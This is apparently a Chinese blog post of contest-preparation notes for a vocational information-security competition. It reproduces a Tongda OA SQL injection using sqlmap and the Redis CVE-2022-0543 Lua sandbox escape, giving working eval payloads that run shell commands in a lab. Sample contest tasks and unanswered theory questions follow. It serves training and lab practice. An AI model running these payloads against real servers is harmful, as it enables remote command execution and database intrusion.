针对国赛知识点总结一

本文涉及的产品
Redis 开源版,标准版 2GB
推荐场景:
搭建游戏排行榜
云数据库 Tair(兼容Redis),内存型 2GB
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介: 狗蛋师傅投稿,师傅讲:因为最近几年的国赛和各个地方省赛会出一些漏洞复现的题目师傅整理出来一些笔记给大家看看

狗蛋师傅投稿,师傅讲:因为最近几年的国赛和各个地方省赛会出一些漏洞复现的题目

师傅整理出来一些笔记给大家看看

1bbbf6f0be3e4a00936eb50ee5f02578.png

全国职业院校技能大赛

高等职业教育组

信息安全管理与评估

模块三

网络安全渗透、理论技能与职业素养

本模块要求参赛者作为攻击方,运用所学的信息收集、漏洞发现、漏洞利用等技术完成对网络的渗透测试;并且能够通过各种信息安全相关技术分析获取存在的flag值。


项目和任务描述


在A集团的网络中存在几台服务器,各服务器存在着不同业务服务。在网络中存在着一定网络安全隐患,请通过信息收集、漏洞挖掘等渗透测试技术,完成指定项目的渗透测试,在测试中获取flag值。网络环境参考样例请查看附录A。


本模块所使用到的渗透测试技术包含但不限于如下技术领域:


• 数据库攻击


• 枚举攻击


• 权限提升攻击


• 基于应用系统的攻击


• 基于操作系统的攻击


• 逆向分析


• 密码学分析


• 隐写分析


所有设备和服务器的IP地址请查看现场提供的设备列表。


工作任务



  • 门户网站(45分)

任务编号

任务一

请对门户网站进行黑盒测试,利用漏洞找到flag1,并将flag1提交。flag1格式flag1{<flag值>}


任务二

请对门户网站进行黑盒测试,利用漏洞找到flag2,并将flag2提交。flag2格式flag2{<flag值>}


任务三

请对门户网站进行黑盒测试,利用漏洞找到flag3,并将flag3提交。flag3格式flag3{<flag值>}

这时候国赛公布的样体里面也有一些


漏洞复现1



显示OA的一个

通达OA v11.9 upsharestatus 后台sql注入漏洞


  • 漏洞描述
  • 通达OA v11.9 及以下版本中由于某些参数过滤不完善导致后台存在SQL注入漏洞
  • 漏洞影响
  • 通达OA <= v11.9

环境搭建

image.png


漏洞复现

  • 漏洞文件位
webroot/general/appbuilder/modules/portal/controllers/WorkbenchController.php


其中 updateAll() 函数并没有使用防止 SQL注入的 sql_injection() 来防止注入

image.png


webroot/inc/conn.php

image.png

所以这里就会出现id参数存在注入的情况,请求包如下: 这是自己复现的请求包

image.png

这是PeiQi文库公布的请求包

image.png

  • 注意 uid参数 要为当前用户的uid才能完成请求,可以使用 burp 遍历查看时间响应
  • 例如这里使用官网的测试账户 uid 遍历出为 15
  • 复现 看响应时间 我的环境uid的值为1

image.png

如果uid错误则不会出现时间延迟,将请求包放入 Sqlmap跑一下

python sqlmap.py -r 2.txt -p id --dbs

image.png


漏洞复现2



Redis Lua沙盒绕过命令执行(CVE-2022-0543)

  • Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。
  • Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

获取vilhub

  • 首先安装git
sudo apt install git


接着下载vulhub

git clone https://github .com/vulhub/vulhub.git


  • 如果下载不下来去此网址自行下载 在使用winscp放进去
  • 安装好后进入次漏洞目录:
  • cd vulhub/redis/CVE-2022-0543/


  • 然后运行靶场
docker-compose build
docker-compose up -d


接着使用工具机连

  • redis-cli -h ip地址 -p 端口
  • redis-cli -h 127.0.0.1 -p 6379


6a1a412a7f4c20995bc6d52e47929727.png

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数,即可获得io库,再使用其执行命令:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /etc/", "r"); local res = f:read("*a"); f:close(); return res' 0

执行的是ls /etc

0ad42b2917e880969c24ccdd37615da0.png

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("uname -a", "r"); local res = f:read("*a"); f:close(); return res' 0

执行 uname -a

ba71e7e081ad9a7503e9b062314254ba.png

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("ls /", "r"); local res = f:read("*a"); f:close(); return res' 0

执行ls /3f7b83f7649f4557e5edfc0a9956869e.png

后边给大家放一套样题的二三阶段



51ad031333e54afe850f150533c7c3e7.png

全国职业院校技能大赛

高等职业教育组

信息安全管理与评估

模块二

网络安全事件响应数字取证调查应用程序安全


竞赛项目赛题


本文件为信息安全管理与评估项目竞赛-第二阶段样题,内容包括:网络安全事件响应、数字取证调查、应用程序安全。

本次比赛时间为180分钟。


介绍


竞赛有固定的开始和结束时间,参赛队伍必须决定如何有效的分配时间。请认真阅读以下指引!

(1)当竞赛结束,离开时请不要关机;

(2)所有配置应当在重启后有效;

(3)请不要修改实体机的配置和虚拟机本身的硬件设置。


所需的设备、机械、装置和材料


所有测试项目都可以由参赛选手根据基础设施列表中指定的设备和软件完成。


评分方案


本测试项目模块分数为300分。


工作任务


第一部分 网络安全事件响应


任务1:Unix服务器应急响应(70分)


A集团的Debian服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。


本任务素材清单:Unix服务器虚拟机


受攻击的Server服务器已整体打包成虚拟机文件保存,请选手自行导入分析。

注意:Server服务器的基本配置参见附录,若题目中未明确规定,请使用默认配置。


请按要求完成该部分的工作任务。

image.png


第二部分 数字取证调查


任务2:基于MacOS的内存取证(40分)


A集团某服务器系统感染恶意程序,导致系统关键文件被破坏,请分析A集团提供的系统镜像和内存镜像,找到系统镜像中的恶意软件,分析恶意软件行为。


本任务素材清单:存储镜像、内存镜像。


请按要求完成该部分的工作任务。


image.png

任务3:通信数据分析取证(工控)(50分)


A集团的网络安全监控系统发现恶意份子正在实施高级可持续攻击(APT),并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,分解出隐藏的恶意程序,并分析恶意程序的行为。


本任务素材清单:捕获的通信数据文件。


请按要求完成该部分的工作任务。

image.png


任务4: 基于Windows计算机单机取证(60分)


对给定取证镜像文件进行分析,搜寻证据关键字(线索关键字为“evidence 1”、“evidence 2”、……、“evidence 10”,有文本形式也有图片形式,不区分大小写),请提取和固定比赛要求的标的证据文件,并按样例的格式要求填写相关信息,证据文件在总文件数中所占比例不低于15%。取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)。


本任务素材清单:取证镜像文件。


请按要求完成该部分的工作任务。

image.png


第三部分 应用程序安全


任务5:Linux恶意程序分析(50分)


A集团发现其发布的应用程序文件遭到非法篡改,您的团队需要协助A集团对该恶意程序样本进行逆向分析、对其攻击/破坏的行为进行调查取证。


本任务素材清单:Linux恶意程序


请按要求完成该部分的工作任务。



任务5:Linux恶意程序分析

序号

任务内容

答案

1

请提交恶意程序回传数据的url地址

2

请指出恶意程序会加密哪些类型的文件

3

请指出恶意程序加密文件的算法

4

请指出恶意程序创建的子进程名称


任务6:JAVA语言代码审计(30分)


代码审计是指对源代码进行检查,寻找代码存在的脆弱性,这是一项需要多方面技能的技术。作为一项软件安全检查工作,代码安全审查是非常重要的一部分,因为大部分代码从语法和语义上来说是正确的,但存在着可能被利用的安全漏洞,你必须依赖你的知识和经验来完成这项工作。


本任务素材清单:Java源文件


请按要求完成该部分的工作任务。


任务6:JAVA语言代码审计

序号

任务内容

答案

1

请指出存在安全漏洞的代码行

2

请指出可能利用该漏洞的威胁名称

3

请修改该代码行使其变得安全



d6d01e4e375b4cf19c27aa6a2238f87b.png

全国职业院校技能大赛

高等职业教育组

信息安全管理与评估

模块三

网络安全渗透、理论技能与职业素养


竞赛项目赛题


本文件为信息安全管理与评估项目竞赛-第三阶段样题,内容包括:网络安全渗透、理论技能与职业素养。


介绍


网络安全渗透的目标是作为一名网络安全专业人员在一个模拟的网络环境中实现网络安全渗透测试工作。


本模块要求参赛者作为攻击方,运用所学的信息收集、漏洞发现、漏洞利用等技术完成对网络的渗透测试;并且能够通过各种信息安全相关技术分析获取存在的flag值。


所需的设施设备和材料

所有测试项目都可以由参赛选手根据基础设施列表中指定的设备和软件完成。


评分方案


本测试项目模块分数为400分,其中,网络安全渗透300分,理论技能与职业素养100分。


项目和任务描述


在A集团的网络中存在几台服务器,各服务器存在着不同业务服务。在网络中存在着一定网络安全隐患,请通过信息收集、漏洞挖掘等渗透测试技术,完成指定项目的渗透测试,在测试中获取flag值。网络环境参考样例请查看附录A。


本模块所使用到的渗透测试技术包含但不限于如下技术领域:


• 数据库攻击


• 枚举攻击


• 权限提升攻击


• 基于应用系统的攻击


• 基于操作系统的攻击


• 逆向分析


• 密码学分析


• 隐写分析


所有设备和服务器的IP地址请查看现场提供的设备列表。


特别提醒


通过找到正确的flag值来获取得分,flag统一格式如下所示:


flag{<flag值 >}


这种格式在某些环境中可能被隐藏甚至混淆。所以,注意一些敏感信息并利用工具把它找出来。


注:部分flag可能非统一格式,若存在此情况将会在题目描述中明确指出flag格式,请注意审题。


工作任务



image.png


  • 企业云盘系统30分)

image.png

  • FTP服务器(165分)

image.png

  • 认证服务器(30分)



任务编号

任务描述

答案

分值

任务十四

认证服务器10000端口存在漏洞,获取FTP服务器上task14目录下的文件进行分析,请利用漏洞找到flag,并将flag提交。flag格式flag{<flag值>}

  • 运维服务器(30分)


任务编号

任务描述

答案

分值

任务十五

运维服务器10001端口存在漏洞,获取FTP服务器上task15目录下的文件进行分析,请利用漏洞找到flag,并将flag提交。flag格式flag{<flag值>}

附录A

23c4094856b24f4ea7638b85512eefdb.png



图1 网络拓扑结构图

  • 理论技能与职业素养(100分)

2023年全国职业院校技能大赛高等职业教育组

“信息安全管理与评估”测试题(样题)


【注意事项】


1.理论测试前请仔细阅读测试系统使用说明文档,按提供的账号和密码登录测试系统进行测试,账号只限1人登录。


2.该部分答题时长包含在第三阶段比赛时长内,请在临近竞赛结束前提交。


3.参赛团队可根据自身情况,可选择1-3名参赛选手进行作答,团队内部可以交流,但不得影响其他参赛队。


一、 单选题 (每题2分,共35题,共70分)

1、为了保护计算机信息系统的安全,促进计算机的应用和发展,保障社会主义现代化建设的顺利进行制定的条例。由中华人民共和国国务院于(  )年2月18日发布实施《中华人民共和国计算机信息系统安全保护条例》,(  )年1月8日修订。


A、 1994   2010


B、 1995   2011


C、 1994   2011


D、 1995   2010


2、随意下载、使用、传播他人软件或资料属于( )信息道德与信息安全失范行为。


A、黑客行为


B、侵犯他人隐私


C、侵犯知识产权


D、信息传播


3、部署大中型 IPSEC  VPN  时,从安全性和维护成本考虑,建议采取什么样的技术手段提供设备间的身份验证。(     )


A、 预共享密钥


B、 数字证书


C、 路由协议验证


D、 802.1x


4、针对Windows系统主机,攻击者可以利用文件共享机制上的Netbios“空会话”连接漏洞,获取众多对其攻击有利的敏感信息,获取的信息中不包含下列哪一项信息?(     )


A、 系统的用户和组信息


B、 系统的共享信息


C、 系统的版本信息


D、 系统的应用服务和软件信息


5、IP数据报分片后的重组通常发生在?(     )


A、 源主机和数据报经过的路由器上


B、 源主机上


C、 数据报经过的路由器上


D、 目的主机上


6、下面不属于SYN FLOODING攻击的防范方法的是?(     )


A、 缩短SYN Timeout(连接等待超时)时间


B、 利用防火墙技术


C、 TCP段加密


D、 根据源IP记录SYN连接


7、当数据库系统出现故障时,可以通过数据库日志文件进行恢复。下列关于数据库日志文件的说法,错误的是(     )。


A、 数据库出现事务故障和系统故障时需使用日志文件进行恢复


B、 使用动态转储机制时,必须使用日志文件才能将数据库恢复到一致状态


C、 在OLTP系统中,数据文件的空间使用量比日志文件大得多,使用日志备份可以降低数据库的备份空间


D、 日志文件的格式主要有以记录为单位的日志文件和以数据块为单位的日志文件两种


8、SQL的GRANT和REVOKE语句可以用来实现(     )。


A、 自主存取控制


B、 强制存取控制


C、 数据库角色创建


D、 数据库审计


9、下面对于数据库视图的描述正确的是(     )。


A、 数据库视图也是物理存储的表


B、 可通过视图访问的数据不作为独特的对象存储,数据库内实际存储的是 SELECT语句


C、 数据库视图也可以使用 UPDATE 或 DELETE 语句生成


D、 对数据库视图只能查询数据,不能修改数据


10、有一种攻击不断对网络服务系统进行干扰,改变其正常的作业流程,执行无关程序使系统显影减慢甚至瘫痪。它影响正常用户的使用,甚至使合法用户被排斥而不能得到服务。这种攻击叫做(     )。


A、 可用性攻击


B、 拒绝性攻击


C、 保密性攻击


D、 真实性攻击


11、16模20的逆元是?(     )


A、 3


B、 4


C、 5


D、 不存在


12、PKZIP 算法广泛应用于(      )程序。


A、 文档数据加密


B、 数据传输加密


C、 数字签名


D、 文档数据压缩


13、下列选项哪列不属于网络安全机制?(     )


A、 加密机制


B、 数据签名机制


C、 解密机制


D、 认证机制


14、一个C程序的执行是从哪里开始的?(     )


A、 本程序的main函数开始,到main函数结束


B、 本程序文件的第一个函数开始,到本程序main函数结束


C、 本程序的main函数开始,到本程序文件的最后一个函数结束


D、 本程序文件的第一个函数开始,到本程序文件的最后一个函数结束


15、检查点能减少数据库完全恢复时所必须执行的日志,提高数据库恢复速度。下列有关检查点的说法,错误的是(     )。


A、 检查点记录的内容包括建立检查点时正在执行的事务清单和这些事务最近一个日志记录的地址


B、 在检查点建立的同时,数据库管理系统会将当前数据缓冲区中的所有数据记录写入数据库中


C、 数据库管理员应定时手动建立检查点,保证数据库系统出现故障时可以快速恢复数据库数据


D、 使用检查点进行恢复时需要从"重新开始文件"中找到最后一个检查点记录在日志文件中的地址


16、下列不属于口令安全威胁的是?(     )


A、 弱口令


B、 明文传输


C、 MD5加密


D、 多账户共用一个密码


17、在远程管理Linux服务器时,以下(     )方式采用加密的数据传输。


A、 rsh


B、 telnet


C、 ssh


D、 rlogin


18、在C语言中(以16位PC机为例),5种基本数据类型的存储空间长度的排列顺序为?(     )


A、 char<int<long int<=float<double


B、 char=int<long int<=float<double


C、 char<int<long int=float=double


D、 char=int=long int<=float<double


19、下列方法中不能用来进行DNS欺骗的是?(     )


A、 缓存感染


B、 DNS信息劫持


C、 DNS重定向


D、 路由重定向


20、以下对DoS攻击的描述,正确的是?(     )


A、 不需要侵入受攻击的系统


B、 以窃取目标系统上的机密信息为目的


C、 导致目标系统无法正常处理用户的请求


D、 若目标系统没有漏洞,远程攻击就不会成功


21、通过TCP序号猜测,攻击者可以实施下列哪一种攻击?(     )


A、 端口扫描攻击


B、 ARP欺骗攻击


C、 网络监听攻击


D、 TCP会话劫持攻击


22、下面不是保护数据库安全涉及到的任务是()。(     )


A、 确保数据不能被未经过授权的用户执行存取操作


B、 防止未经过授权的人员删除和修改数据


C、 向数据库系统开发商索要源代码,做代码级检查


D、 监视对数据的访问和更改等使用情况


23、下面不是 Oracle 数据库提供的审计形式的是(     )。


A、 备份审计


B、 语句审计


C、 特权审计


D、 模式对象设计


24、在一下古典密码体制中,属于置换密码的是?(     )


A、 移位密码


B、 倒叙密码


C、 仿射密码


D、 PlayFair 密码


25、一个基于网络的IDS应用程序利用什么来检测攻击?(     )


A、 正确配置的DNS


B、 特征库


C、 攻击描述


D、 信息包嗅探器


26、下列工具中可以对web表单进行暴力破解的是?(     )


A、 Burp suite


B、 Nmap


C、 sqlmap


D、 Appscan


27、在(    )年,美国国家标准局NBS把IBM的Tuchman-Meyer方案确定数据加密标准,即  DES。(     )


A、 1949


B、 1972


C、 1977


D、 2001


28、VIM模式切换的说法中,正确的是?(     )


A、 命令模式通过i命令进入输入模式


B、 输入模式通过:切换到末行模式


C、 命令模式通过ESC键进入末行模式


D、 末行模式通过i进入输入模式


29、密码学的目的是?(     )


A、 研究数据加密


B、 研究数据解密


C、 研究数据保密


D、 研究信息安全


30、能显示TCP和UDP连接信息的命令是?(     )


A、 netstat -s


B、 netstat -e


C、 netstat -r


D、 netstat -a


31、重合指数法对下面哪种密码算法的破解最有效?(     )


A、 置换密码


B、 单表代换密码


C、 多表代换密码


D、 序列密码


32、Python中哪个占位符表示字符串数据?(     )


A、 %s


B、 %S


C、 %d


D、 %b


33、关于sed操作命令中,说法错误的是?(     )


A、 a 命令在行的前面另起一行新增


B、 p 命令打印相关行,配合-n使用


C、 c 命令替换行


D、 d 命令删除行


34、RIP路由协议有RIP v1 和RIP v2两个版本,下面关于这两个版本的说法错误的是(     )。


A、 RIP v1和RIP v2都具有水平分割功能


B、 RIP v1 是有类路由协议,RIP v2是无类路由协议


C、 RIP v1 和 RIP v2 都是以跳数作为度量值


D、 RIP v1 规定跳数的最大值为15,16跳视为不可达;而RIP v2无此限制


35、在RHEL5系统中,对Postfix邮件服务的配置主要通过修改(    )文件来进行。


A、 Main.cf


B、 Smtpd.conf


C、 Postfix.cf


D、 Postfix.conf


二、 多选题 (每题3分,共10题,共30分)


1、Apache服务器外围加固措施包括?(       )


A、 部署WAF


B、 部署IPS


C、 部署IDS


D、 部署蜜罐系统


2、数据库系统可能的潜在安全风险包括(       )。


A、 操作系统安全风险,包括软件的缺陷、未进行软件安全漏洞修补工作、脆弱的服务和选择不安全的默认配置


B、 数据库系统中可用的但并未正确使用的安全选项、危险的默认设置、给用户不适当的权限、对系统配置的未经授权的改动等


C、 不及时更改登录密码或密码太过简单,存在对重要数据的非法访问以及窃取数据库内容或恶意破坏等


D、 数据库系统的内部风险,如内部用户的恶意操作等


3、关于函数,下面哪些说法是错误的?(       )


A、 函数必须返回一个结果


B、 函数不能调用自身


C、 函数命名只能以字母或数字开头


D、 在同一个文件中,不应定义重名的函数


4、netwox工具拥有以下哪些功能?(       )


A、 嗅探


B、 SQL注入


C、 欺骗


D、 地址转换


5、移动用户常用的VPN接入方式是(       )。


A、 L2TP


B、 IPSECHIKE野蛮模式


C、 GRE+IPSEC


D、 L2TP+IPSEC


6、以下关于TCP和UDP协议的说法错误的是?(       )


A、 没有区别,两者都是在网络上传输数据


B、 TCP是一个定向的可靠的传输层协议,而UDP是一个不可靠的传输层协议


C、 UDP是一个局域网协议,不能用于Interner传输,TCP则相反


D、 TCP协议占用带宽较UDP协议多


7、APTECH公司的管理员使用DPM 2007对Exchange Server 2007中的邮件进行备份还原,当通过Exchange Server 2007中的恢复存储组进行还原时,下列选项中说法正确的是(       )。


A、 可以对单个用户的邮箱数据进行还原


B、 只能够对整个存储组的所有用户邮箱数据进行还原


C、 其他存储组的用户邮箱不可用


D、 需要停止Microsoft Exchange Information Store服务


8、Bash环境变量中,常见的环境变量有?(       )


A、 HOSTNAME


B、 PASS


C、 SHELL


D、 USER


9、防火墙的主要技术有哪些?(       )


A、 简单包过滤技术


B、 状态检测包过滤技术


C、 应用代理技术


D、 复合技术


10、关于IKE的描述正确的是(       )


A、 IKE不是在网络上直接传送密钥,而是通过一系列数据的交换,最终计算出双方共享的密钥


B、 IKE是在网络上传送加密后的密钥,以保证密钥的安全性


C、 IKE采用完善前向安全特性PFS,一个密钥被破解,并不影响其他密钥的安全性


D、 IKE 采用DH算法计算出最终的共享密钥


目录
相关文章
|
机器学习/深度学习 算法 前端开发
阿里面试官分享+真实面经+笔试模拟题 | 面试充电,就看这篇
阿里面试官分享+真实面经+笔试模拟题+招聘信息汇总,太全了!这篇合辑一定要看,不然就亏大啦!
阿里面试官分享+真实面经+笔试模拟题 | 面试充电,就看这篇
|
6月前
|
Java
JavaOOP考前复习重点
JavaOOP考前复习重点
24 0
|
7月前
|
机器学习/深度学习 供应链 数据挖掘
管理信息系统知识点复习
管理信息系统知识点复习
148 0
|
7月前
|
数据建模 测试技术 uml
【软件工程】期末复习总结(通俗易懂,学不会来打我)
【软件工程】期末复习总结(通俗易懂,学不会来打我)
技术面试常见智力题
了解技术面试常见智力题。
260 0
离散数学常见面试问题总结,含答案
离散数学常见面试问题总结,含答案
|
C++
2023-1-10-C++知识点宝藏文章
2023-1-10-C++知识点宝藏文章
45 0
大学物理B2 知识点整理
大学物理B2 知识点整理
95 0
大学物理B2 知识点整理
|
存储 C语言
【校招面经】8道指针面试真题,快来检测自己掌握了几道。
【校招面经】8道指针面试真题,快来检测自己掌握了几道。
【校招面经】8道指针面试真题,快来检测自己掌握了几道。
下一篇
DataWorks